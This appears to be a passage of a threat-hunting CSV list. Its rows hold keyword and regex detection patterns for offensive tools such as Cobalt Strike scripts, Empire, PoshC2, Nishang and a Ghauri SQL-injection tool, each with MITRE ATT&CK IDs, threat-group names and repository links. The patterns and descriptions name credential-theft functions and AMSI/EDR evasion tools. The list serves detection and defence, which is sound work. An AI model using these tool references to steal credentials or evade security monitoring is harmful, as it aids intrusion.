"*GetWebDAVStatus.csproj*",".{0,1000}GetWebDAVStatus\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus.sln*",".{0,1000}GetWebDAVStatus\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" 
"*GetWebDAVStatus_DotNet*",".{0,1000}GetWebDAVStatus_DotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_x64.o*",".{0,1000}GetWebDAVStatus_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWhoamiCommand*",".{0,1000}GetWhoamiCommand.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*GetWhoamiCommand.cs*",".{0,1000}GetWhoamiCommand\.cs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a 
tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*GetWindowsCredentials.exe*",".{0,1000}GetWindowsCredentials\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Get-Wlan-Keys*",".{0,1000}Get\-Wlan\-Keys.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-WLAN-Keys*",".{0,1000}Get\-WLAN\-Keys.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of 
PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-Wlan-Keys.ps1*",".{0,1000}Get\-Wlan\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WMIEventLogins*",".{0,1000}Get\-WMIEventLogins.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*getwmiregcachedrdpconnection*",".{0,1000}getwmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmiregcachedrdpconnection*",".{0,1000}get\-wmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*getwmireglastloggedon*",".{0,1000}getwmireglastloggedon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmireglastloggedon*",".{0,1000}get\-wmireglastloggedon.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmiregmounteddrive*",".{0,1000}get\-wmiregmounteddrive.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red 
teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-WorkingHours*",".{0,1000}Get\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gexplorer.exe*",".{0,1000}gexplorer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*ghauri currently only supports DBMS fingerprint payloads for Microsoft Access*",".{0,1000}ghauri\scurrently\sonly\ssupports\sDBMS\sfingerprint\spayloads\sfor\sMicrosoft\sAccess.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Ghauri detected connection errors multiple times*",".{0,1000}Ghauri\sdetected\sconnection\serrors\smultiple\stimes.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Ghauri is expecting database name to enumerate table(s) entries*",".{0,1000}Ghauri\sis\sexpecting\sdatabase\sname\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web 